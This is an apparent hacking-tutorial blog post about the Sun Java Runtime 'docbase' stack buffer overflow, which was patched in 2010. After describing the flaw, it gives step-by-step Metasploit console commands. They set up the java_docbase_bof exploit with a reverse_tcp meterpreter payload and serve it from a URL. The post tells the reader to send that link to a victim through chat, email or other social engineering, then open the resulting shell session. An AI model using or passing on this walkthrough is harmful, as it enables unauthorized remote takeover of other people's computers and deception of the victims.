Hack PC in LAN with Sun Java Runtime Buffer Overflow Attack

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 20

Java 6 Standard Edition Update 18

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_docbase_bof

Msf exploit (java_docbase_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_docbase_bof)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_docbase_bof)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_docbase_bof)>set uripath javadocbase (The Url to use for this exploit)

Msf exploit (java_docbase_bof)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/javadocbase

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

 

Leave a Reply

Your email address will not be published. Required fields are marked *